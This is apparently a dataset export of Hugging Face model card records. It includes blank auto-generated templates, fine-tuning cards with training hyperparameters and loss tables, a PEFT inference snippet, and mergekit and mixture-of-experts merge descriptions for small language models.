[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
herMaster/pythia70M-finetuned-on-lamini-docs | herMaster | 2024-01-22T07:07:03Z | 17 | 0 | transformers | [
"transformers",
"pytorch",
"gpt_neox",
"text-generation",
"generated_from_trainer",
"dataset:lamini/lamini_docs",
"base_model:EleutherAI/pythia-70m",
"base_model:finetune:EleutherAI/pythia-70m",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"region:us"
] | text-generation | 2023-10-19T05:57:44Z | ---
license: apache-2.0
base_model: EleutherAI/pythia-70m
tags:
- generated_from_trainer
model-index:
- name: pythia70M-finetuned-on-lamini-docs
results: []
inference: false
datasets:
- lamini/lamini_docs
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# pythia70M-finetuned-on-lamini-docs
This model is a fine-tuned version of [EleutherAI/pythia-70m](https://huggingface.co/EleutherAI/pythia-70m) on the [lamini/lamini_docs](https://huggingface.co/datasets/lamini/lamini_docs) dataset.
It achieves the following results on the evaluation set:
- Loss: 2.0582
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1e-05
- train_batch_size: 1
- eval_batch_size: 1
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 4
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 1
- num_epochs: 3
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:----:|:---------------:|
| 3.3194 | 0.16 | 50 | 2.4776 |
| 2.3198 | 0.32 | 100 | 2.3780 |
| 2.16 | 0.48 | 150 | 2.2905 |
| 2.2156 | 0.63 | 200 | 2.2450 |
| 2.3342 | 0.79 | 250 | 2.1934 |
| 2.7634 | 0.95 | 300 | 2.1748 |
| 2.4963 | 1.11 | 350 | 2.1500 |
| 2.1493 | 1.27 | 400 | 2.1413 |
| 1.8731 | 1.43 | 450 | 2.1200 |
| 2.0132 | 1.59 | 500 | 2.1030 |
| 1.9606 | 1.75 | 550 | 2.0848 |
| 1.37 | 1.9 | 600 | 2.0659 |
| 1.7681 | 2.06 | 650 | 2.0744 |
| 1.8926 | 2.22 | 700 | 2.0779 |
| 1.2409 | 2.38 | 750 | 2.0683 |
| 1.489 | 2.54 | 800 | 2.0616 |
| 1.5143 | 2.7 | 850 | 2.0604 |
| 1.3736 | 2.86 | 900 | 2.0582 |
### Framework versions
- Transformers 4.34.1
- Pytorch 2.0.1+cu118
- Datasets 2.14.5
- Tokenizers 0.14.1 |
urisoo/gptneo-125m-adalora | urisoo | 2024-01-22T07:06:13Z | 5 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:EleutherAI/gpt-neo-125m",
"base_model:adapter:EleutherAI/gpt-neo-125m",
"region:us"
] | null | 2024-01-22T07:06:11Z | ---
library_name: peft
base_model: EleutherAI/gpt-neo-125m
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.7.2.dev0 |
fasterinnerlooper/llama-7b-qlora-csharp | fasterinnerlooper | 2024-01-22T06:57:05Z | 18 | 0 | peft | [
"peft",
"safetensors",
"generated_from_trainer",
"base_model:stabilityai/stable-code-3b",
"base_model:adapter:stabilityai/stable-code-3b",
"license:other",
"region:us"
] | null | 2024-01-15T17:38:28Z | ---
license: other
library_name: peft
tags:
- generated_from_trainer
base_model: stabilityai/stable-code-3b
model-index:
- name: llama-7b-qlora-csharp
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# llama-7b-qlora-csharp
This model is a fine-tuned version of [stabilityai/stable-code-3b](https://huggingface.co/stabilityai/stable-code-3b) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 1
- eval_batch_size: 1
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 4
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.3
- training_steps: 50
### Framework versions
- PEFT 0.7.1
- Transformers 4.36.2
- Pytorch 2.1.2+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0 |
Jaemink/lg_application | Jaemink | 2024-01-22T06:56:29Z | 3 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:davidkim205/komt-Llama-2-13b-hf",
"base_model:adapter:davidkim205/komt-Llama-2-13b-hf",
"region:us"
] | null | 2024-01-22T06:56:09Z | ---
library_name: peft
base_model: davidkim205/komt-Llama-2-13b-hf
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.7.2.dev0 |
ssong1/gpt-j-5.8b-sum-adapter | ssong1 | 2024-01-22T06:50:25Z | 6 | 0 | peft | [
"peft",
"safetensors",
"en",
"kr",
"dataset:open-Orca/OpenOrca",
"license:apache-2.0",
"region:us"
] | null | 2024-01-16T08:37:58Z | ---
license: apache-2.0
library_name: peft
base_model: ssong1/kgpt-j-5.8b
datasets:
- open-Orca/OpenOrca
language:
- en
- kr
---
#### This Model
This model is a fine-tuned version of [EleutherAI/polyglot-ko-5.8b](https://huggingface.co/EleutherAI/polyglot-ko-5.8b).
It was aligned with [🤗 TRL's](https://github.com/huggingface/trl) `SFTTrainer` on the [Open-Orca/OpenOrca](https://huggingface.co/datasets/Open-Orca/OpenOrca) dataset.
#### How to use
```python
import json
import torch
from peft import LoraConfig, get_peft_model
from transformers import AutoTokenizer, AutoModelForCausalLM, BitsAndBytesConfig
from peft import PeftModel
model1 = AutoModelForCausalLM.from_pretrained(
"ssong1/gpt-j-5.8b", torch_dtype="auto", device_map="auto"
)
lora_path = "ssong1/gpt-j-5.8b-sum-adapter"
model2 = PeftModel.from_pretrained(model1, lora_path, device_map="auto")
tokenizer = AutoTokenizer.from_pretrained(lora_path)
prompt_template = """\
{system_prompt}<|im_end|>
<|im_start|>user
{prompt}<|im_end|>
<|im_start|>assistant"""
msg = "Q:다음 문서를 요약 하세요, Context:{context}"
system_prompt = "You are an AI assistant. User will you give you a task. Your goal is to complete the task as faithfully as you can."
context="""\
"""
tokens = tokenizer.encode(
prompt_template.format(
system_prompt=system_prompt,
prompt=msg.format(context=context),
),
return_tensors="pt",
).to(model2.device, non_blocking=True)  # "auto" is not a valid tensor device; move inputs to the model's device
gen_tokens = model2.generate(
input_ids=tokens,
do_sample=False,
temperature=0.5,
max_length=1024,
pad_token_id=63999,
eos_token_id=63999,
)
inputs = tokenizer.batch_decode([gen_tokens[0][: tokens[0].shape[0]]])[0]
generated = tokenizer.batch_decode([gen_tokens[0][tokens[0].shape[0] :]])[0].replace(
"<|im_end|>", ""
)
print(inputs)
print("\ngenerated:")
print(generated)
```
### Framework versions
- PEFT 0.7.1 |
DooDooHyun/AIFT-42dot_LLM-PLM-1.3B-ao-instruct-all-v0.55 | DooDooHyun | 2024-01-22T06:46:41Z | 60 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"generated_from_trainer",
"base_model:42dot/42dot_LLM-PLM-1.3B",
"base_model:finetune:42dot/42dot_LLM-PLM-1.3B",
"license:cc-by-nc-4.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-22T06:27:06Z | ---
license: cc-by-nc-4.0
base_model: 42dot/42dot_LLM-PLM-1.3B
tags:
- generated_from_trainer
model-index:
- name: AIFT-42dot_LLM-PLM-1.3B-ao-instruct-all-v0.55
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# AIFT-42dot_LLM-PLM-1.3B-ao-instruct-all-v0.55
This model is a fine-tuned version of [42dot/42dot_LLM-PLM-1.3B](https://huggingface.co/42dot/42dot_LLM-PLM-1.3B) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 24
- eval_batch_size: 8
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 96
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 1.0
- mixed_precision_training: Native AMP
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.2+cu121
- Datasets 2.0.0
- Tokenizers 0.15.0
|
jeiku/Rosa_v1_3B | jeiku | 2024-01-22T06:44:59Z | 42 | 3 | transformers | [
"transformers",
"safetensors",
"stablelm_epoch",
"text-generation",
"conversational",
"custom_code",
"en",
"license:other",
"autotrain_compatible",
"region:us"
] | text-generation | 2023-12-25T20:10:09Z | ---
language:
- en
license: other
---
First and foremost, I would like to thank https://huggingface.co/Aryanne for pointing me in the right direction. This model started as a remix of https://huggingface.co/Aryanne/Astrea-RP-v1-3B. A healthy helping of https://huggingface.co/jondurbin/airoboros-3b-3p0 was added. The entire thing was then mixed back over itself with several methods before a touch of https://huggingface.co/pansophic/rocket-3B and https://huggingface.co/stabilityai/stablelm-zephyr-3b was added. The model was then mixed with an older version of itself twice to water down the influence of the DPO models.
In the end I was left with a seemingly coherent and interesting AI companion model. I intend to test this model further to see if anything else can be done to improve it.
Named after my faithful companion Rosa. This model will be her foundation on my mobile device.
GGUF version here: https://huggingface.co/jeiku/Rosa_v1_3B_GGUF |
OmBenz/finetuned-gtzan | OmBenz | 2024-01-22T06:43:55Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"hubert",
"audio-classification",
"generated_from_trainer",
"dataset:marsyas/gtzan",
"base_model:facebook/hubert-base-ls960",
"base_model:finetune:facebook/hubert-base-ls960",
"license:apache-2.0",
"model-index",
"endpoints_compatible",
"region:us"
] | audio-classification | 2024-01-22T06:37:54Z | ---
license: apache-2.0
base_model: facebook/hubert-base-ls960
tags:
- generated_from_trainer
datasets:
- marsyas/gtzan
metrics:
- accuracy
model-index:
- name: hubert-base-ls960-finetuned-gtzan
results:
- task:
name: Audio Classification
type: audio-classification
dataset:
name: GTZAN
type: marsyas/gtzan
config: all
split: train
args: all
metrics:
- name: Accuracy
type: accuracy
value: 0.88
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# hubert-base-ls960-finetuned-gtzan
This model is a fine-tuned version of [facebook/hubert-base-ls960](https://huggingface.co/facebook/hubert-base-ls960) on the GTZAN dataset.
It achieves the following results on the evaluation set:
- Loss: 0.7650
- Accuracy: 0.88
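As the card does not include a usage example, here is a minimal sketch using the audio-classification pipeline (assuming the repo id shown on this page, `OmBenz/finetuned-gtzan`, and a local audio file):
```python
# Sketch: predict a GTZAN genre for a local audio clip.
from transformers import pipeline

classifier = pipeline("audio-classification", model="OmBenz/finetuned-gtzan")
predictions = classifier("some_track.wav")  # hypothetical path to a local audio file
print(predictions)  # list of {'label': genre, 'score': probability}
```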
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 4
- eval_batch_size: 4
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 15
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy |
|:-------------:|:-----:|:----:|:---------------:|:--------:|
| 2.2258 | 1.0 | 225 | 1.9240 | 0.28 |
| 1.6083 | 2.0 | 450 | 1.4887 | 0.39 |
| 1.3983 | 3.0 | 675 | 1.3524 | 0.56 |
| 0.7368 | 4.0 | 900 | 1.3110 | 0.56 |
| 0.6121 | 5.0 | 1125 | 0.9572 | 0.72 |
| 0.1772 | 6.0 | 1350 | 0.8775 | 0.73 |
| 1.8666 | 7.0 | 1575 | 0.6078 | 0.82 |
| 0.091 | 8.0 | 1800 | 0.9999 | 0.76 |
| 0.0458 | 9.0 | 2025 | 0.7169 | 0.83 |
| 0.6817 | 10.0 | 2250 | 0.7614 | 0.86 |
| 0.7023 | 11.0 | 2475 | 0.9348 | 0.84 |
| 0.0047 | 12.0 | 2700 | 0.7222 | 0.88 |
| 0.0363 | 13.0 | 2925 | 0.7027 | 0.89 |
| 0.0073 | 14.0 | 3150 | 0.7440 | 0.88 |
| 0.0055 | 15.0 | 3375 | 0.7650 | 0.88 |
### Framework versions
- Transformers 4.38.0.dev0
- Pytorch 2.1.2+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
SuccubusBot/NoroFighter-13B-v0.1a-AWQ | SuccubusBot | 2024-01-22T06:40:29Z | 6 | 0 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"merge",
"mergekit",
"lazymergekit",
"KoboldAI/LLaMA2-13B-Psyfighter2",
"NeverSleep/Noromaid-13b-v0.2",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"4-bit",
"awq",
"region:us"
] | text-generation | 2024-01-22T06:37:32Z | ---
license: apache-2.0
tags:
- merge
- mergekit
- lazymergekit
- KoboldAI/LLaMA2-13B-Psyfighter2
- NeverSleep/Noromaid-13b-v0.2
---
# NoroFighter-13B-v0.1a
Our very first attempt at merging models!
`NoroFighter-13B-v0.1a` is a merge of the following models using [mergekit](https://github.com/cg123/mergekit):
* [KoboldAI/LLaMA2-13B-Psyfighter2](https://huggingface.co/KoboldAI/LLaMA2-13B-Psyfighter2)
* [NeverSleep/Noromaid-13b-v0.2](https://huggingface.co/NeverSleep/Noromaid-13b-v0.2)
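For anyone wanting to reproduce a merge like this, a configuration of the shape shown in the next section is typically applied with the `mergekit-yaml` CLI. This is only a sketch: the config filename is hypothetical, and flags may differ across mergekit versions.
```shell
# Sketch: run the merge from a saved copy of the YAML config below.
pip install mergekit
mergekit-yaml norofighter.yaml ./NoroFighter-13B-v0.1a --cuda
```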
## 🧩 Configuration
```yaml
merge_method: dare_ties
dtype: float16
base_model: TheBloke/Llama-2-13B-fp16
models:
- model: TheBloke/Llama-2-13B-fp16
- model: KoboldAI/LLaMA2-13B-Psyfighter2
parameters:
weight: 0.3
density: 0.53
- model: NeverSleep/Noromaid-13b-v0.2
parameters:
weight: 0.7
density: 0.53
``` |
CLMBR/binding-reconstruction-transformer-3 | CLMBR | 2024-01-22T06:39:23Z | 12 | 0 | transformers | [
"transformers",
"pytorch",
"opt",
"text-generation",
"generated_from_trainer",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-17T22:51:11Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-reconstruction-transformer-3
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-reconstruction-transformer-3
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.8568
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 3
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.2251 | 0.03 | 76320 | 4.1961 |
| 4.0217 | 1.03 | 152640 | 4.0263 |
| 3.9113 | 0.03 | 228960 | 3.9512 |
| 3.845 | 1.03 | 305280 | 3.9098 |
| 3.7952 | 0.03 | 381600 | 3.8847 |
| 3.7506 | 1.03 | 457920 | 3.8690 |
| 3.7172 | 0.03 | 534240 | 3.8581 |
| 3.6885 | 1.03 | 610560 | 3.8512 |
| 3.6612 | 0.03 | 686880 | 3.8465 |
| 3.6363 | 0.03 | 763200 | 3.8437 |
| 3.6152 | 1.03 | 839520 | 3.8421 |
| 3.5959 | 0.03 | 915840 | 3.8426 |
| 3.5758 | 1.03 | 992160 | 3.8422 |
| 3.5552 | 0.03 | 1068480 | 3.8419 |
| 3.5382 | 1.03 | 1144800 | 3.8440 |
| 3.5253 | 0.03 | 1221120 | 3.8441 |
| 3.5111 | 1.03 | 1297440 | 3.8450 |
| 3.4998 | 0.03 | 1373760 | 3.8470 |
| 3.4832 | 1.03 | 1450080 | 3.8483 |
| 3.4754 | 0.03 | 1526400 | 3.8490 |
| 3.4668 | 1.03 | 1602720 | 3.8499 |
| 3.4585 | 0.03 | 1679040 | 3.8526 |
| 3.4478 | 1.03 | 1755360 | 3.8536 |
| 3.4399 | 0.03 | 1831680 | 3.8538 |
| 3.4268 | 1.03 | 1908000 | 3.8557 |
| 3.4147 | 0.03 | 1984320 | 3.8563 |
| 3.4035 | 1.03 | 2060640 | 3.8571 |
| 3.3938 | 0.03 | 2136960 | 3.8578 |
| 3.3836 | 1.03 | 2213280 | 3.8590 |
| 3.3694 | 0.03 | 2289600 | 3.8594 |
| 3.3597 | 1.03 | 2365920 | 3.8598 |
| 3.3515 | 0.03 | 2442240 | 3.8609 |
| 3.3398 | 1.03 | 2518560 | 3.8605 |
| 3.332 | 0.03 | 2594880 | 3.8613 |
| 3.3229 | 1.03 | 2671200 | 3.8608 |
| 3.316 | 0.03 | 2747520 | 3.8610 |
| 3.3117 | 1.03 | 2823840 | 3.8607 |
| 3.3036 | 0.03 | 2900160 | 3.8601 |
| 3.2983 | 1.03 | 2976480 | 3.8590 |
| 3.2935 | 0.02 | 3052726 | 3.8568 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
Kquant03/BurningBruce-SOLAR-8x10.7B-bf16 | Kquant03 | 2024-01-22T06:35:51Z | 1,376 | 4 | transformers | [
"transformers",
"safetensors",
"mixtral",
"text-generation",
"merge",
"moe",
"conversational",
"en",
"arxiv:2101.03961",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-20T02:10:32Z | ---
license: apache-2.0
language:
- en
tags:
- merge
- moe
thumbnail: ""
---

# Theoretically unstoppable. (evals prove otherwise)
A Convex frankenMoE. Created via improving the original Seraphim script. The models that were implemented are as follows:
- [kyujinpy/Sakura-SOLAR-Instruct](https://huggingface.co/kyujinpy/Sakura-SOLAR-Instruct) - base
- [PracticeLLM/SOLAR-tail-10.7B-Merge-v1.0](https://huggingface.co/PracticeLLM/SOLAR-tail-10.7B-Merge-v1.0) - expert #1
- [NousResearch/Nous-Hermes-2-SOLAR-10.7B](https://huggingface.co/NousResearch/Nous-Hermes-2-SOLAR-10.7B) - expert #2
- [kyujinpy/Sakura-SOLAR-Instruct](https://huggingface.co/kyujinpy/Sakura-SOLAR-Instruct) - expert #3
- [NousResearch/Nous-Hermes-2-SOLAR-10.7B](https://huggingface.co/NousResearch/Nous-Hermes-2-SOLAR-10.7B) - expert #4
- [upstage/SOLAR-10.7B-Instruct-v1.0](https://huggingface.co/upstage/SOLAR-10.7B-Instruct-v1.0) - expert #5
- [kodonho/SolarM-SakuraSolar-SLERP](https://huggingface.co/kodonho/SolarM-SakuraSolar-SLERP) - expert #6
- [kyujinpy/Sakura-SOLAR-Instruct](https://huggingface.co/kyujinpy/Sakura-SOLAR-Instruct) - expert #7
- [kyujinpy/Sakura-SOLAR-Instruct](https://huggingface.co/kyujinpy/Sakura-SOLAR-Instruct) - expert #8
# "[What is a Mixture of Experts (MoE)?](https://huggingface.co/blog/moe)"
### (from the MistralAI papers...click the quoted question above to navigate to it directly.)
The scale of a model is one of the most important axes for better model quality. Given a fixed computing budget, training a larger model for fewer steps is better than training a smaller model for more steps.
Mixture of Experts enable models to be pretrained with far less compute, which means you can dramatically scale up the model or dataset size with the same compute budget as a dense model. In particular, a MoE model should achieve the same quality as its dense counterpart much faster during pretraining.
So, what exactly is a MoE? In the context of transformer models, a MoE consists of two main elements:
